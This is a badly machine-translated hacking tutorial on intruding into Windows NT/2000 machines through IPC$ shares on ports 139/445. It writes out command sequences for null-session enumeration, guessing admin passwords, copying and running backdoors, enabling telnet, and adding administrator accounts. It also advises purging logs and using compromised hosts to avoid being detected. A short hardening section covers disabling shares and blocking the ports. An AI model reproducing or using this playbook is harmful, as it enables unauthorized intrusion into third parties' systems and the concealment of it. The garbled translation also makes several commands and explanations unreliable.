445port intrusion description

445port intrusion description
About "445port intrusion"
445port intrusion description
This site searches for many other content about "445port intrusion"

445port intrusion. Before that, we should first look at the issue of 445port intrusion. Why is 445port becoming an intrusion port?
445port is the default port of the IPC service.
IPC $
Summary
2. What is IPC $
3. What is an empty session?
What can a four-Null Session do?
Five IPC $ port used
Significance of six IPC pipelines in hack attacks
Seven IPC $ common causes of connection failure
8. Causes of file copy failure
IX limitations on the AT command and XP on IPC $
10. How to enable the target IPC $ sharing and other sharing?
Eleven commands that require shell processing
Commands that may be used during the 12th intrusion
Thirteen against past and current IPC $ intrusion
14. How to Prevent IPC $ intrusion
15 IPC $ featured intrusion Q &
End of 16th
Summary
The online articles on IPC $ intrusion can be said to be cool, and the attack steps have even become a solid model. Therefore, no one wants to take things that have become a norm and play around with them. However, I think these articles are not specific, and some content is even incorrect. As a result, the question about IPC $ accounts for half of the discussion areas of major security forums, these problems are often repeated, which seriously affects the quality and learning efficiency of the Forum. Therefore, I have summarized this article and hope to clarify IPC $ as much as possible.
Note: All the situations discussed in this article occur in the Windows NT/2000 environment by default, and Win98 will not be discussed here.
2. What is IPC $
IPC $ (Internet process connection) is a resource that shares "named pipes". It is a named pipe open for inter-process communication. By providing a trusted username and password, connect the two parties to establish a secure channel and exchange encrypted data through this channel, so as to enable remote computer failover. IPC $ is a new feature of NT/2000. It has a feature that only one connection is allowed between two IP addresses at the same time. When the IPC $ function is provided for NT/2000, default sharing is enabled when the system is installed for the first time, that is, all logical sharing (C $, d $, e $ ...... ) And the system directory winnt or Windows (ADMIN $. All of these, Microsoft's original intention is to facilitate administrator management, but intentionally or unintentionally, leading to a reduction in system security.
We often hear people talking about the IPC $ vulnerability and IPC $ vulnerability. In fact, IPC $ is not a real vulnerability, it must be the 'webshell 'placed by Microsoft itself: Null Session ). So what is an empty session?
3. What is an empty session?
Before introducing null sessions, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge response protocol is used to establish a session with a remote machine. A successful session will become a secure tunnel through which the two parties can communicate with each other, the general sequence of this process is as follows:
1) The session requestor (customer) transmits a data packet to the session receiver (server) and requests the establishment of a security tunnel;
2) The server generates a random 64-digit number (implementing the Challenge) and transmits it back to the customer;
3) The customer obtains the 64-digit number generated by the server, disconnects it with the password of the account trying to establish the session, and returns the result to the server (implementing the response );
4) The server receives the response and sends it to the local security authentication (LSA). lsa verifies the response by using the correct password of the user to confirm the identity of the requester. Assume that the requester's account is the local account of the server and the local account is verified. Assume that the requested account is a domain account, and the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, a token is generated and then sent to the customer. The customer uses this token to ask the token to connect to the resources on the server until the suggested session is terminated.
The above is a general process of establishing a secure session. What about empty sessions?
Empty sessions are Sessions established with the server without trust (that is, username and password are not provided). However, according to the ghost Q & A Control Model of Win2000, A token is required for the establishment of a null session, but the null session is not authenticated by user information during the creation process. Therefore, this token does not include user information, this session cannot send encrypted information between systems, but it does not indicate that the security identifier Sid (which identifies the user and the group) is not included in the token of the empty session. For an empty session, the SID of the token provided by LSA is s-1-5-7, which is the SID of the empty session. username is: Anonymous Logon (This username can be seen in the user list, however, the token cannot be found in the SAM Database and belongs to the built-in account of the system. The token contains the following disguised groups:
Everyone
Network
Under the limits of the security policy, this empty session will be authorized by the principal to ask all the information that the above two groups have the right to seek. So what can an empty session be created?
What can a four-Null Session do?
For nt, with the default security settings, empty connections can be used to list users and shares on the target host, asking everyone to share the permissions of everyone, and asking others to add small tables to attention, there is not much value for use; it is less useful for 2000, because in Windows 2000 and later versions, Only Administrators and Backup Operators have the right to ask about the attention table from the network region by default, and it is not convenient to implement it. You need to use tools.
We can see from these that such untrusted sessions are not very useful, but from a complete IPC $ intrusion, empty sessions are an essential stepping stone, because we can get the user list from it, and most weak password scanning tools use this user list to guess the password, the exported user list is greatly added? The success rate of guessing is enough to indicate the security risks caused by empty sessions. Therefore, it is wrong to say that empty sessions are useless. The following are some specific commands that can be used in an empty session:
1 first, create an empty SESSION (of course, this requires the objective to open IPC $)
Command: net use \ IP \ IPC $ ""/User :""
Note: The preceding command contains four spaces. There is a space between net and use, one after use, and one space around password.
2. view the shared resources of the remote host
Command: Net view \ IP
Explanation: The premise is that after an empty connection is established, you can use this command to view the shared resources of the remote host. If it is shared, the following results can be obtained, however, this command cannot display the default share.
Share resources in \ *. *
Resource Sharing name type usage gaze
-----------------------------------------------------------
Netlogon disk Logon Server share
Sysvol disk Logon Server share
The command is successfully completed.
3. view the current time of the remote host
Command: Net time \ IP
Explanation: You can use this command to obtain the current time of a remote host.
4. Obtain the NetBIOS username list of the remote host (enable NBT)
Command: NBTSTAT-A IP
Run the following command to obtain the NetBIOS username list of the remote host:
Node IPaddress: [*. *] scope ID: []
NetBIOS remote machine name table
Name type status
---------------------------------------------
Server <00> unique registered
OYAMANISHI-H <00> group registered
OYAMANISHI-H <1C> group registered
Server <20> unique registered
OYAMANISHI-H <1B> unique registered
OYAMANISHI-H <1E> group registered
Server <03> unique registered
OYAMANISHI-H <1D> unique registered
. _ Msbrowse _. <01> group registered
Inet ~ Services <1C> group registered
Is ~ Server... <00> unique registered
MAC address = 00-50-8b-9A-2d-37
The above is what we often use empty sessions to do. It seems that we can also get a lot of things, but note that the operations for establishing an IPC $ connection will leave a record in the event log, whether or not you log on successfully. Now, let's take a look at what port IPC $ uses?
Five IPC $ port used
First, let's take a look at some basic knowledge:
1 smbserver Message Block) Windows protocol family, used for file printing and sharing services;
2 nbtnetbios over TCP/IP) Use 137 (UDP) 138 (UDP) 139 (TCP) port to implement NetBIOS network interconnection based on TCP/IP protocol.
3. In WindowsNT, SMB is implemented based on NBT, that is, 139 (TCP) port is used. In Windows2000, SMB is implemented through 445 port in addition to NBT.
With these basic knowledge, we can further discuss the port selection for network sharing in the workshop:
For Win2000 client (initiator:
1. If NBT is agreed to connect to the server, the client will attempt to notify 139 and 445 ports at the same time. If 445 port has a response, then, the RST packet is sent to the 139 port to disconnect and use the 455 port for session. When the 445 port does not respond, the 139 port is used. If neither port responds, the session fails;
2. If NBT is prohibited from connecting to the server, the client will only try to issue the 445 port in the dig command. If the 445 port does not respond, the session fails.
For Win2000 Server:
1. If NBT is agreed, UDP port 137,138 and TCP port 139,445 will be open (Listening );
2. If NBT is disabled, only 445 ports are open.
The same port selection for our established IPC $ session complies with the above principles. Obviously, if the remote server does not listen on port 139 or port 445, the IPC $ session cannot be established.
Significance of six IPC pipelines in hack attacks
The IPC pipeline was originally designed by Microsoft to facilitate remote management by administrators, but it seems easier for intruders to open the IPC pipeline to hosts. Through the IPC pipeline, We can remotely call some system functions (mostly implemented through tools, but corresponding permissions are required), which is often the key to the success or failure of intrusion. If you do not consider this, the IPC pipeline has already given great support to intruders, and even has become the most important means of transmission, as a result, you can always see some friends in major forums who cannot open the IPC pipeline of the target machine, but cannot help. Of course, we cannot ignore the important role that permissions play in the IPC pipeline. You must have tasted the embarrassment of empty sessions. If you do not have the permissions, you cannot start the pipeline. However, once an intruder has the administrator privilege, the IPC pipeline will display the side of the vulnerability.
Seven IPC $ common causes of connection failure
The following are some common causes of connection failure of IPC $:
1 IPC connection is a special function in Windows NT and above. Because it requires many DLL Functions in Windows NT, it cannot be executed in Windows 9.x/ me, that is to say, only NT/2000/XP can establish an IPC $ connection to each other. 98/Me cannot establish an IPC $ connection;
2. If you want to successfully establish an IPC $ connection, the responder must enable IPC $ sharing, even if it is a null connection. If the responder closes IPC $ sharing, a connection cannot be established;
3. The connection initiator has not started the lanmanworkstation Service (display name: workstation): it provides network link and communication, and the initiator cannot initiate connection requests without it;
4. the responder has not started the LanmanServer Service (display name: Server): it provides RPC support, file, printing, and named pipe sharing. IPC $ depends on this service, without it, the host will not be able to respond to the initiator's connection request, but it can still initiate an IPC $ connection without it;
5. the responder has not enabled netlogon. It supports the pass-through account logon identity on the computer on the Network (but this does not seem to happen );
6. The 139,445 port of the responder is not monitored or blocked by the firewall;
7. The connection initiator did not open the 139,445 port;
8. username or password error: If this error occurs, the system will give you an error message similar to 'unable to update password' (apparently, an empty session will exclude this error );
9. command input error: there may be more or less spaces. If the username and password do not contain spaces, the double-cited tokens on both sides can be omitted. If the password is empty, you can directly enter two quotes;
10 if the other party restarts the computer after a connection is established, the IPC $ connection is automatically disconnected and requires another connection.
In addition, you can analyze the cause based on the returned error number:
Error No. 5: Deny: it is very likely that the user you are using is not the administrator privilege;
Error No. 51. The network path cannot be found in Windows: The network is faulty;
Error No. 53, network path not found: IP address error; target not on; Target LanmanServer service not started; Target firewall (Port filter );
Error No. 67. network name not found: Your lanmanworkstation service is not started or the target has deleted IPC $;
Error 1219: The creden provided conflict with the existing creden set: You have already created an IPC $ with the other party. Please delete and reconnect;
Error Code 1326, unknown username or wrong password: The cause is very obvious;
Error Code 1792: attempted to log on, but the network login service was not started: the target netlogon service was not started;
Error Code 2242: the user's password has expired: The target has an account policy, and the password must be changed periodically.
8. Causes of file copy failure
Some of my friends have successfully established an IPC $ connection, but they have encountered such a problem during copy and cannot be copied successfully. What are the common causes of replication failure?
1. the other party has not enabled the shared directory.
This type of error occurs most, accounting for more than 50%. After the IPC $ connection is established successfully, many friends do not even know whether the other party has a shared directory, so they perform blind replication. As a result, the replication fails and is very depressing. Therefore, we recommend that you use the netview \ ip command to check whether the shared directory you want to copy exists (it is better to use the software) before copying ), do not think that a shared directory exists if you can establish an IPC $ connection.
2. failed to share with default
This type of errors is also common and involves two major aspects:
1) The default share must be enabled for the host that can establish the IPC $ connection. Therefore, the default share must be enabled for the host immediately after the connection is established to C $, d $, ADMIN $ and Other Default shared copy files. If the default share is not enabled, the copy will fail. The successful IPC $ connection only indicates that the Peer has enabled IPC $ sharing, and does not indicate that the default sharing exists. IPC $ sharing and default sharing are two things. IPC $ sharing is a named pipeline, not a real directory, but a real shared directory by default;
2) because the net view \ ip command cannot display the default shared directory (because the default shared directory has $), we cannot infer whether the other party has enabled the default share by using this command, therefore, if the default share is not enabled, all operations performed on the default share cannot be successful. (most scanning software can scan the default share directory when weak passwords are scanned, can avoid such errors)
Key Point: please be sure to distinguish between IPC sharing, which is shared by default. The difference between normal sharing and IPC sharing is that IPC sharing is a pipe rather than a shared directory; by default, shared files are the directories opened by default during installation. Common shared files are shared directories enabled by ourselves that can set permissions.
3. Insufficient user permissions, including:
1) when a null connection is replicated to all shares (default share and normal share), the permission is insufficient;
2) in Win2000 pro, only members of the Administrators and Backup Operators groups can submit questions about these shared directories to the server operatros group of Win2000 Server;
3) When copying data to a common shared object, you must have the corresponding permissions (that is, the token permission set in advance by the other administrator );
4) the other party can prohibit external users from sharing questions through firewall or security software settings;
Note:
1. Do not think that the Administrator must have the Administrator permission. The Administrator name can be changed.
2. The administrator can ask the default shared directory, but may not be able to ask the common shared directory. Because the administrator can set the permission of the common shared directory, 6, if the administrator sets the allow permission for disk D to allow only users with the name of xinxin to perform a full deny query on the directory, you still cannot ask disk D even if you have the Administrator permission. It is only interesting that, assuming that the other party has enabled the default share of d $ at this time, you can ask d $ in question, thus bypassing the permission restriction, if you are interested, you can try it yourself.
4 killed by the firewall or on the LAN
In another case, your copy operation may have been successful, but when you remotely execute the operation, it is killed by the firewall, and the file cannot be found; or you copy the Trojan horse to the host in the LAN, causing connection failure (reverse connection trojans do not happen ). If you didn't think of such a situation, you would think that there was a problem with the replication, but your actual replication operation has been successful, just because there was a problem during execution.
Well, you know that there will be various problems in the actual operation of the IPC $ connection. What I have summarized above is just some common errors that I did not mention, you can remind me.
IX limitations on the AT command and XP on IPC $
I would also like to explain the cause of the failure of remote program execution with at, but considering the success rate of at is not very high and there are many problems, I will not mention it here (the more I mention, the more users you use), but we recommend that you use mongoxec.exe to remotely execute the program. If you want to remotely execute the local c: \ xinxin.exe file, the Administrator is administrator, and the password is 1234, enter the following command:
Export xec \ IP-u administrator-P 1234-C: \ xinxin.exe
Assuming that an IPC connection has been established, the-u-p two partitions are not required. mongoxec.exe copies the file to a remote machine and runs the command.
Originally, I didn't want to discuss IPC $ in XP here. I wanted to discuss it separately, but I saw more and more friends eager to ask why most operations were very difficult when I encountered XP. Here is a simple example. In XP's default security options, No matter what remote access requests are granted only the guest permission, that is, even if you use the Administrator account and password, the permissions you get are only guest. Therefore, most operations fail due to insufficient permissions. So far, there is no good way to break through this restriction. So if you really get the XP Administrator password, I suggest you avoid the IPC pipeline as much as possible.
10. How to enable the target IPC $ sharing and other sharing?
The target IPC $ cannot be opened easily, otherwise the world will be disrupted. You need a shell with the admin permission, such as telnet, Trojan, CMD redirection, and so on, and then run the following command in shell:
NET Share IPC $
Open the target IPC $ sharing;
NET Share IPC $/del
Disable IPCS $ sharing. If you want to open a shared directory for it, you can use:
NET Share xinxin = c :\
In this way, the C drive is opened as the shared directory named xinxin. (However, I found many people mistakenly think that the command to open the shared directory is net share C $, and it is really a mistake to give a big example to cainiao ). Again, we declare that these operations can be implemented only in shell.
Eleven commands that require shell processing
I can see that many tutorials are not accurate in this aspect. Some commands that require shell skill are simply executed under the IPC $ connection, which is misleading. Here is a summary of the commands that need to be completed in shell:
1. Create a user to the remote host, activate the user, and change the user password. The operations to join the management group must be completed in shell;
2. Enable IPC $ sharing for the remote host. Shared by default. Common shared operations must be completed in shell;
3. Execute/Close the remote host service, which must be completed in shell;
4. The process of starting/killing the remote host must also be completed in Shell (except in the case of software, such as pskill ).
Commands that may be used during the 12th intrusion
For the integrity of this tutorial, I have listed some frequently used commands in the IPC $ intrusion. If you have mastered these commands, you can skip this part and read the following content. Note whether these commands are applicable locally or remotely. If they are only applicable locally, you can only execute them to the remote host after obtaining the shell (such as cmd and telnet) of the remote host.
1. Create/delete an IPC $ connection command
1) Create an empty connection:
Net use \ 127.0.0.1 \ IPC $ ""/User :""
2) establish a non-empty connection:
Net use \ 127.0.0.1 \ IPC $ "password"/User: "username"
3) delete a connection:
Net use \ 127.0.0.1 \ IPC $/del
2. Operation commands for remote hosts in the IPC $ connection
1) view the shared resources of the remote host (default share is not displayed ):
Net view \ 127.0.0.1
2) view the current time of the remote host:
Net time \ 127.0.0.1
3) obtain the NetBIOS username list for the remote host:
NBTSTAT-A 127.0.0.1
4) ing/deleting Remote sharing:
Net use Z: \ 127.0.0.1 \ c
This command maps the shared resource named C to a local Z disk.
Net use Z:/del
Delete the mapped Z disk, other disks, and so on.
5) copy files to the remote host:
Copy path \ file name \ IP \ shared directory name, for example:
Copy c: \ xinxin.exe \ 127.0.0.1 \ C $ copy the xinxin.exe from drive C to the C drive of the other party
Of course, you can also copy files on the remote host to your machine:
Copy \ 127.0.0.1 \ C $ \ xinxin.exe c :\
6) Remote join? Scheduled tasks:
At \ IP time program name:
At \ 127.0.0.0 :00 xinxin.exe
Note: The time should be in the 24-hour format. If the program you plan to execute is in the system's default search path (such as system32/), you do not need to add a path. Otherwise, you must add a full path.
3 local commands
1) view the shared resources of the local host (the local default share is displayed)
NET Share
2) obtain the user list of the local host
Net user
3) display the account information of a local user
Net user account name
4) displays the services currently started by the local host.
Net start
5) Start/Close local services
Net start service name
Net stop service name
6) add locally? Account
Net user account name password/Add
7) Activate disabled users
Net uesr account name/active: Yes
8) join the Administrator Group
Net localgroup Administrators account name/Add
Obviously, although these are all local commands, assume that you enter them in the remote host shell, for example, after telnet is successful, enter the above commands, then these local inputs will apply to the remote host.
4. Other commands
1) Telnet
Telnet IP Port
Telnet 127.0.0.0 23
2) use opentelnet.exe to enable telnet for the remote host.
The authentication method port of the opentelnet.exe \ IP Administrator account password NTLM
Opentelnet.exe \ 127.0.0.1 administrator "" 1 90
This tool must meet four requirements:
1) IPC $ sharing is enabled for the target.
2) You need to have the administrator password and account
3) Enable the RemoteRegistry Service to change the NTLM authentication.
4) valid only for Win2k/XP
3) Use cmdxec.exe to obtain the shell in one step and support the IPC pipeline.
Export xec.exe \ IP-u Administrator Account-P password cmd
Export xec.exe \ 127.0.0.1-u administrator-P "" cmd
Thirteen against past and current IPC $ intrusion
Since it is a comparison, I will first write the previous IPC $ intrusion steps to everyone, which is a classic step:
[1]
C: \> net use \ 127.0.0.1 \ IPC $ "/User: admintitrators
\ Use a blank password to establish a connection
[2]
C: \> net view \ 127.0.0.1
\ View remote shared resources
[3]
C: \> copy srv.exe \ 127.0.0.1 \ ADMIN $ \ System32
\ Copy the one-time backdoor srv.exe to the target system directory, provided that the ADMIN $ function is enabled.
[4]
C: \> net time \ 127.0.0.1
\ View the current time of the remote host
[5]
C: \> at \ 127.0.0.1 time srv.exe
\ Use the AT command to remotely execute srv.exe. The other party must enable the 'Task schedout' service.
[6]
C: \> net time \ 127.0.0.1
\ Check the current time again to determine whether srv.exe has been executed. This step can be omitted
[7]
C: \> Telnet 127.0.0.1 99
\ Open a new form and remotely log on to 127.0.0.1 via Telnet to obtain a shell (what does Shell mean? Then you can think of it as the control of the remote machine, the operation is like DOS), 99 port is the port of the one-time backdoor opened by srv.exe
[8]
C: \ winnt \ system32> Net start Telnet
\ We started the telnet service for the remote machine in the shell we just logged on to. After all, srv.exe is a one-time backdoor. We need a long backdoor for future reference, this step can be omitted if the peer's telnet has been started.
[9]
C: \> copy ntlm.exe \ 127.0.0.1 \ ADMIN $ \ System32
\ Transfer ntlm.exe in the original form. ntlm.exe is used to change the Telnet AUTHENTICATION.
[10]
C: \ winnt \ system32> ntlm.exe
\ Execute ntlm.exe in the shell form, and then you will be able to smoothly Telnet this host.
[11]
C: \> Telnet 127.0.0.1 23
\ Telnet to 127.0.0.1 and port 23 in the new form can be omitted, so that we can obtain a long-term Backdoor
[12]
C: \ winnt \ system32> net user account name password/Add
C: \ winnt \ system32> net uesr guest/active: Yes
C: \ winnt \ system32> net localgroup Administrators account name/Add
\ After telnet, you can create a new account, activate guest, and add any account to the Administrator group.
Well, I seem to have been back here two or three years ago. At that time, IPC $ was used by everyone, but with the emergence of new tools, some of the tools and commands mentioned above are not frequently used today. Let's take a look at today's efficient and simple IPC $ intrusion.
[1]
Export xec.exe \ IP-u Administrator Account-P password cmd
\ With this tool, we can get the shell in one step
Opentelnet.exe \ Server administrator account password NTLM authentication Port
\ It Can Be Used to conveniently change the authentication method and port for telnet, so that we can log on
[2]
There is no second step. After you use one step to obtain the shell, you can do enough. The backdoors can use winshell. You can use CA to clone the shell. You can use 3389.vbe to open the terminal and record the password with win2kpass, in short, there are a lot of good tools. If you choose one, I won't say much about it.
14. How to Prevent IPC $ intrusion
1. Disable NULL connections for enumeration (this operation cannot prevent NULL connections from being established)
Execute regedit and find the following primary key [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ LSA] to change the key value of restrictanonymous = DWORD to: 1
If it is set to "1", an anonymous user can still connect to IPC $ share, but cannot obtain the permissions to list SAM accounts and share information through such a connection; add in Windows2000? If you do not obtain the anonymous permission, you cannot perform an IPC $ null connection. We recommend that you set it to 1. If the primary key mentioned above does not exist, create a new one and change the key value. If you think it is difficult to change the comment table, you can set this item in local security settings: Local Security Settings-local policy-Security Options-'additional restrictions on anonymous connections'
2. Disable default sharing
1) view local shared resources
Run-cmd-enter net share
2) delete a shared object (the shared object still exists by default after it is restarted)
NET Share IPC $/delete
NET Share ADMIN $/delete
NET Share C $/delete
NET Share d $/delete (assume there are E, F ,...... Can continue to delete)
3) Stop the Server Service
Net stop server/Y (the server service will be enabled again after another startup)
4) disable the default sharing function (IPCS $ sharing cannot be disabled)
Execute-Regedit
Server version: Find the following primary key, for example, [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Parameters], and change the key value of AutoShareServer (DWORD) to 00000000.
Pro: Find the following primary key, for example, [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Parameters], and change the key value of auto‑wks (DWORD) to 00000000.
These two key values do not exist on the host by default. Do you need to manually add them ?, After modification, restart the machine to make the settings take effect.
3. Disable IPC $ and the default shared dependency service: Server service.
If you really want to disable IPC $ sharing, disable the Server Service:
Control Panel-Administrative Tools-service-find Server Service (right-click)-properties-General-start type-select Disabled, then a message may be prompted: the xxx service will also disable whether to continue. Some secondary services depend on the server service, so do not worry about it.
4 shield 139,445 port
Without the support of the preceding two ports, you cannot establish IPC $. Therefore, blocking the same 139,445 port can prevent the intrusion of IPC $.
1) 139 port can be blocked by disabling NBT
Local Connection-TCP/It properties-advanced-wins-select 'Disable Netbios on TCP/It'
2) The 445 port can be blocked by modifying the "NOTE" table.
Join? One key value
Hive: HKEY_LOCAL_MACHINE
Key: System \ ControlSet \ Services \ netbt \ Parameters
Name: smbdeviceenabled
Type: REG_DWORD
Value: 0
Restart the machine after modification.
Note: If the two ports are blocked, you cannot use IPC $ to intrude into others.
3) install the firewall for port filtering
6. Set a complicated password to prevent the password from being cited through IPC $. I think this is the best way to enhance security awareness, which is much safer than continuously patching.
15 IPC $ featured intrusion Q &
There are a lot of theoretical things mentioned above, but in practice you will encounter various problems, so in order to give everyone the greatest help, I have sorted out some representative Q & A Questions in various security forums. Some of the answers are my answers and some are replies on the Forum. If you have any questions, I can discuss them with you.
1. During the IPC $ intrusion, records will be left in the server. Is there any way to prevent the server from discovering the records?
A: It is certain that you can use the log purge program to delete the logs after you leave the system, or use bots to intrude into the system.
2. You can see why the connection can be established but cannot be copied.
Net use \ ***. *** \ IPC $ "password"/User: "username"
Command successful
Copy icmd.exe \ ***. *** \ ADMIN $
Network path not found
Command failed
A: most problems such as "network path not found" and "network name not found" are due to the fact that the shared directory you want to copy is not enabled, So errors may occur during replication, you can try to find other shared directories.
3. assume that the Peer has an IPC $ option and can establish a null connection, but password is required when the C and D disks are opened. I know that the empty connection does not have many permissions, but is there no other way?
A: It is recommended that you try to guess the password by using the streamer or other scanning software. If you cannot guess the password, you can just give up. After all, the empty connection capability is limited.
4. I have guessed the Administrator's password and the IPC $ connection is successful. But net view \ IP finds that it has not enabled default sharing. What should I do?
A: First, correct one of your mistakes. By using net view \ IP, you cannot see the default share. You can try to copy the file to C $, d $. If none of them works, it means that the default share is disabled. Use opentelnet.exe or cmdxec.exe.
5. After the IPC $ connection is successful, I used the following command to create an account and found that the account is on my own machine. What is the problem?
Net uset ccbirds/Add
A: The successful establishment of IPC $ only indicates that you have established a communication tunnel with the remote host. It does not mean that you have obtained a shell. After obtaining a shell (such as telnet, you can create an account on a remote machine. Otherwise, your operation is only performed locally.
6. I have already logged on to a meat machine and used an administrator account to view the system time, But copying the program to his machine won't work. Every time I say "refuse to ask, 0 files have been copied. "Is there any service unavailable to the other party? What should I do?
A: In general, "deny" is the result of insufficient permissions. It may be because your account has a problem. Another possibility is, if you want to copy a file to a common shared directory, this error is returned, indicating that the permission set for this directory does not include you (even if you are an administrator ), I analyzed this in the previous article.
7. Can I establish an IPC $ connection with the other party using Win98?
A: theoretically, we cannot perform IPC $ operations. We recommend that you use Win2000. using other operating systems will cause a lot of unnecessary trouble.
8. I used net use \ IP \ IPC $ ""/user "to successfully create an empty session, but nbtstat-A IP cannot be used to export the user list. Why?
A: By default, empty sessions can be used to export user lists. However, if the administrator modifies the "Notice" table to disable list export, what you said will happen; it is also possible that your NBT is not enabled, and the netstat command is built on NBT.
9. When I establish an IPC $ connection, the following information is returned: 'creden provided conflict with an existing creden set'. What is the problem?
A: Well, it means that you have established an IPC $ connection with the target host. You do not agree to establish two IPC $ connections at the same time between the two hosts.
10. I displayed the following during ing:
F: \> net use H: \ 211.161.134. * \ e $
85 error occurs in the system.
The local device name is in use. What's going on?
A: You are too careless. This indicates that you have an H disk. map it to a drive letter that does not exist!
11. I established a connection F: \> net use \\*. *. *. * \ IPC $ "123"/User: "guest" succeeded, but an error occurred while I mapped it. Ask me for a password. Why?
F: \> net use H: \ *. * \ C $
The password is invalid in \ *. *. * \ C $.
Enter the password of \ *. * \ C $:
System Error 5.
Refuse to ask.
A: Well, I want to ask you for a password, indicating that you are currently using insufficient user permissions and cannot map to C $, which is shared by default. Please try to improve your permissions or find a weak administrator password! By default, sharing usually requires administrator permissions.
12. I scanned a host with 139 port on superscan, but why cannot I leave it empty?
A: You have confused the relationship between IPC $ and 139. The host that can be connected to IPC $ must have port 139 or port 445 enabled, however, the hosts with these two ports may not be able to connect empty, because the other side can disable IPC $ sharing.
13. Most of the machines in our LAN are xp. I scanned several administrator accounts with a streaming light and the passwords were empty. I was able to connect them, but I couldn't copy anything. I said error 5. Why?
A: XP is more secure. In the default settings of the security policy, when you perform authentication on the network logon of the local account, you may feel that the guest permission is required, even if you log on remotely as an administrator, you only have the guest permission. Therefore, if you copy a file, it is certainly incorrect. 5: the permission is insufficient.
14. I used net use \ 192.168.0.2 \ IPC $ "password"/User: "Administrator", but net use I: \ 192.168.0.2 \ c
Enter \ 192.168.0.2 password. How can this problem be solved? I used it, but what about the administrator? What should I do?
A: Even if you have the Administrator permission, the Administrator must set the C-disk sharing permission (Note: The general share permission can be set, but the default share permission is not) this problem may occur because the Administrator has not been set to allow the Administrator to ask.
15. If your machine has disabled IPC $, can I still use IPC $ to connect to another machine? What if Server service is prohibited?
A: do not allow the above two items to initiate an IPC $ connection, but it is better to test the connection by yourself.
16. Can you tell me the cause of the following two errors?
C: \> net time \ 61. 225 .*.*
System Error 5.
Refuse to ask.
C: \> net view \ 61. 225 .*.*
System Error 5.
Refuse to ask.
A: At first, I was very puzzled when I encountered this problem. Error 5 indicates that the permission is not enough, but even the permissions for a blank session can be completed by the above two commands. Why can't he do it? Didn't he establish a connection? Later, the careless Comrade told me that this was indeed the case. He forgot that he had deleted the IPC $ connection, and then he entered the two commands above, with error 5.
17. What's going on?
F: \> net time
The time server cannot be found.
Type net helpmsg 3912 for a lot of other help.
A: The answer is very easy. Your command is wrong. It should be net time \ IP.
No IP address is entered. Of course, the server cannot be found. The view command should also have an IP address, that is, net view \ IP

Favorite shared score